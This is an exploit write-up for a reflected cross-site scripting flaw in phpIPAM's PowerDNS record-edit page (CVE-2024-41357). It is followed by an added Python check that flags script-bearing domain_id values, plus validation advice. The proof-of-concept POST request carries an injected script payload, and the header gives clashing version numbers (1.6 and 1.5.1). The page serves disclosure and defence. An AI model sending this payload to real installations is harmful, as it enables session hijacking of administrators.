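phpIPAM 1.6 Reflected Cross-Site Scripting (XSS) Vulnerability: Analysis and Exploitation

This article describes the reflected cross-site scripting (XSS) vulnerability in phpIPAM 1.6 (CVE-2024-41357) and provides a proof-of-concept (PoC) exploitation method. By sending a specially crafted POST request, an attacker can execute arbitrary JavaScript in the administrator's browser context, which may lead to session hijacking or further attacks.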

Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)

Date: 2025-11-25

Exploit Author: CodeSecLab

Vendor Homepage: https://github.com/phpipam/phpipam/

Software Link: https://github.com/phpipam/phpipam/

Version: 1.5.1

Tested on: Windows

CVE: CVE-2024-41357

Proof Of Concept

PoC to trigger the XSS vulnerability in phpIPAM 1.6

Ensure you are logged in as an admin user to satisfy the admin check condition.

Send the following POST request to trigger the XSS vulnerability:

POST /app/admin/powerDNS/record-edit.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Content-Length: <calculated_length>

action=add&domain_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

This will execute the alert(1) script when the response is rendered in the browser.
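
A defensive check built on the request above, as an added example that is not part of the original post or of phpIPAM: it parses captured raw HTTP requests and flags POSTs to the same endpoint whose domain_id is not a plain decimal value. The assumption that a legitimate domain_id is numeric, the function names and the sample captures are constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter name are taken from the request shown above.
TARGET_PATH = "/app/admin/powerDNS/record-edit.php"
PARAM = "domain_id"
HTML_META = set("<>\"'&")

# Constructed sample captures: the request from this page and a benign one.
POC_REQUEST = (
    "POST /app/admin/powerDNS/record-edit.php HTTP/1.1\r\n"
    "Host: phpipam\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "action=add&domain_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"
)
BENIGN_REQUEST = (
    "POST /app/admin/powerDNS/record-edit.php HTTP/1.1\r\n"
    "Host: phpipam\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "action=add&domain_id=12"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, decoded form fields)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:
        return "", "", {}
    fields = parse_qs(body.strip(), keep_blank_values=True)
    return parts[0].upper(), urlsplit(parts[1]).path, fields


def check_request(raw):
    """Return findings for one request; an empty list means nothing flagged."""
    method, path, fields = parse_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return []
    findings = []
    for value in fields.get(PARAM, []):
        # Assumption: a legitimate domain_id is a plain decimal identifier.
        if not (value.isascii() and value.isdigit()):
            meta = sorted(HTML_META & set(value))
            findings.append({"param": PARAM, "value": value, "html_meta": meta})
    return findings


if __name__ == "__main__":
    for name, req in (("poc", POC_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, check_request(req))
```

The same non-numeric test can be applied server-side as input validation before the value is echoed, with HTML encoding on output as the second layer.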
